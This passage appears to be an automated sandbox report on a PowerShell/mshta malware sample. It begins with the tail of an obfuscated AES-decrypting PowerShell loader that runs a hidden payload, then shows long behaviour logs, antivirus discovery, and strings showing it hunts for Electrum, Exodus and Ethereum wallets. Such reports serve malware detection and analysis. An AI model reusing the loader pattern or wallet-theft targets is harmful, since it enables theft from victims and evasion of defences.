7176e6c6f19529dfc27fedf76eaecc83b65cdb18f573a47ca511abb57c0e2fb271f43f876c7e4ebb670821dee11f27961708ecc5a51060ab343764d0d66a8f570de51685313e5643f216aba89a781c9437c8360bdd168a4f24cc7eedbaf8cb939b2cd236895145bee8327e515c72c6e3f8945f6b99dd6856d6b85a39a9636ef180d230b26c5e84de8c40a71ae0f1b4c4b3abee23b5b26ff40ac1d252c89c4c40a58e6456eba4f5fbfc23');$hubqy=-join [char[]](([security.cryptography.aes]::create()).createdecryptor((rofjg('446d676a575941436563554774726d56')),[byte[]]::new(16)).transformfinalblock($xhko,0,$xhko.length)); & $hubqy.substring(0,3) $hubqy.substring(129)Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00438430 cpuid 8_2_00438430
                  Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: powershell.exe, 00000008.00000002.3001201192.000000000301C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3836, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: powershell.exe, 00000008.00000002.3001201192.00000000030AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *electrum*
                  Source: powershell.exe, 00000008.00000002.3001201192.0000000003047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                  Source: powershell.exe, 00000008.00000002.3001201192.00000000030AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *exodus*
                  Source: powershell.exe, 00000008.00000002.3001201192.00000000030AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *ethereum*
                  Source: powershell.exe, 00000002.00000002.2061701636.00000000075F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
